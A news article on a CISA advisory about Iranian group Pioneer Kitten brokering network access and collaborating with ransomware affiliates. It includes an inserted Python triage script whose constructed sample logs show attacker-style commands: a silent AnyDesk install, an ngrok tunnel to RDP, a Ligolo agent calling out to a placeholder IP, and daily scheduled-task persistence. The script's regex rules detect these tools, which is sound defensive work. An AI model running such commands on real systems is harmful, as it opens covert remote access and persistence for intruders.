Hackers sponsored by the Iranian government are acting as go-betweens and initial access brokers to target environments on behalf of financially motivated ransomware gangs, including big names such as ALPHV/BlackCat, the US Cybersecurity and Infrastructure Security Agency (CISA) has warned.
In an advisory published this week, CISA and its law enforcement partners, including the FBI, revealed that the Iranian advanced persistent threat (APT) group tracked variously as Pioneer Kitten, UNC757, Parisite, Rubidium and Lemon Sandstorm has been conducting malicious cyber operations aimed at deploying ransomware attacks to obtain, maintain and develop network access.
“These operations aid malicious cyber actors in further collaborating with affiliate actors to continue deploying ransomware,” CISA said.
“This advisory outlines activity by a specific group of Iranian cyber actors that has conducted a high volume of computer network intrusion attempts against US organisations since 2017 and as recently as August 2024. Compromised organisations include US-based schools, municipal governments, financial institutions and healthcare facilities.”
The FBI had previously observed the group attempting to monetise its access to victim organisations on underground markets, and now assesses that a “significant percentage” of its activity – at least in the US – is focused on selling this access on to Russian-speaking cyber crime gangs.
But the relationship now appears to run deeper than a simple sale of access. The Feds now believe Pioneer Kitten has been “collaborating directly” with ransomware affiliates, receiving a cut of the ransom payments in exchange for its assistance.
“These actors have collaborated with the ransomware affiliates NoEscape, RansomHouse, and ALPHV (aka BlackCat),” CISA said.
“The Iranian cyber actors’ involvement in these ransomware attacks goes beyond providing access; they work closely with ransomware affiliates to lock victim networks and strategise on approaches to extort victims.
“The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin.”
Thwarting the Kitten
A Pioneer Kitten-enabled ransomware attack generally seems to begin with the exploitation of remote external services on internet-facing assets.
In recent weeks, the gang has been observed using Shodan to identify IP addresses hosting Check Point Security Gateways vulnerable to CVE-2024-24919, but it is also known to have exploited CVE-2024-3400 in Palo Alto Networks PAN-OS and GlobalProtect VPN, as well as older vulnerabilities in Citrix and F5 BIG-IP. Addressing these issues should be priority number one for security teams in at-risk organisations.
Once beyond this first hurdle, the group’s modus operandi is in most regards a fairly standard one. It captures login credentials on Netscaler devices via a deployed webshell, elevates its privileges by hijacking or creating new accounts, often with exemptions to zero-trust policies, places backdoors to load malware, and tries to disable antivirus software and lower security settings. It also sets up a daily Windows service task to maintain persistence even as the victim begins mitigation.
When it comes to command and control, Pioneer Kitten is known to use the AnyDesk remote access programme and to enable Windows PowerShell Web Access on compromised servers. It also favours Ligolo, an open source tunnelling tool, and ngrok to create outbound connections.
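As an added illustration (not part of the advisory or this article), the following Python triage runs a handful of detection rules over constructed process-creation log lines, flagging the tooling named above: AnyDesk installs, Ligolo and ngrok tunnels, enabling of PowerShell Web Access, and daily scheduled-task creation. The pipe-separated log format, host names and command lines are all constructed for the example.

```python
"""Triage constructed process-creation log lines for the tooling described
above. Log format ('ts|host|user|command'), hosts and commands are constructed."""
import re

# Each rule: (finding label, regex applied to the command-line field)
RULES = [
    ("remote-access tool: AnyDesk", re.compile(r"anydesk(\.exe)?\b", re.I)),
    ("tunnelling tool: Ligolo", re.compile(r"\bligolo", re.I)),
    ("tunnelling tool: ngrok", re.compile(r"\bngrok(\.exe)?\b.*\b(tcp|http)\b", re.I)),
    # PowerShell Web Access is enabled with these (real) Windows cmdlets
    ("PowerShell Web Access enabled",
     re.compile(r"Install-WindowsFeature\s+WindowsPowerShellWebAccess"
                r"|Install-PswaWebApplication", re.I)),
    ("daily scheduled task created",
     re.compile(r"schtasks(\.exe)?\s+/create\b.*?/sc\s+daily", re.I)),
]

def parse_line(line):
    """Split one constructed log line into its four fields."""
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}

def triage(lines):
    """Return a list of (host, label) for every rule that matches a line."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        for label, rx in RULES:
            if rx.search(ev["cmd"]):
                findings.append((ev["host"], label))
    return findings

def hosts_to_review(lines):
    """Sorted, de-duplicated hosts with at least one finding."""
    return sorted({host for host, _ in triage(lines)})

# Constructed sample log; the chrome.exe line is benign noise for contrast.
SAMPLE_LOG = [
    "2024-08-27T10:01:00Z|ns-mgmt01|svc_backup|C:\\Users\\Public\\AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent",
    "2024-08-27T10:05:00Z|srv-web02|admin2|powershell.exe -Command Install-WindowsFeature WindowsPowerShellWebAccess",
    "2024-08-27T10:06:00Z|srv-web02|admin2|powershell.exe -Command Install-PswaWebApplication -UseTestCertificate",
    "2024-08-27T10:12:00Z|srv-web02|admin2|schtasks.exe /create /tn Updater /sc daily /tr C:\\ProgramData\\svc.exe",
    "2024-08-27T10:20:00Z|ws-114|jdoe|C:\\Program Files\\Google\\Chrome\\chrome.exe",
    "2024-08-27T10:25:00Z|srv-web02|admin2|C:\\ProgramData\\ngrok.exe tcp 3389",
    "2024-08-27T10:30:00Z|srv-web02|admin2|C:\\ProgramData\\ligolo-agent.exe -connect 203.0.113.5:11601",
]

if __name__ == "__main__":
    for host, label in triage(SAMPLE_LOG):
        print(f"{host}: {label}")
```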
The full CISA advisory contains more technical details on its attack chain.
Has Pioneer Kitten gone rogue?
Interestingly, the US authorities also said Pioneer Kitten’s ransomware activities may not be officially sanctioned by Tehran. The group’s members – who operate under the cover of an Iranian IT company, Danesh Novin Sahand – have occasionally expressed concern that the Iranian government may be monitoring their money-laundering activities.
Pioneer Kitten’s official remit, said CISA, appears to be to conduct hack-and-leak campaigns, stealing data and publicising it, not to make money, but to undermine their victims as part of Iranian information operations. This activity seems to have been largely focused on victims in Israel and other regional powers of interest to Iran, including Azerbaijan and the United Arab Emirates.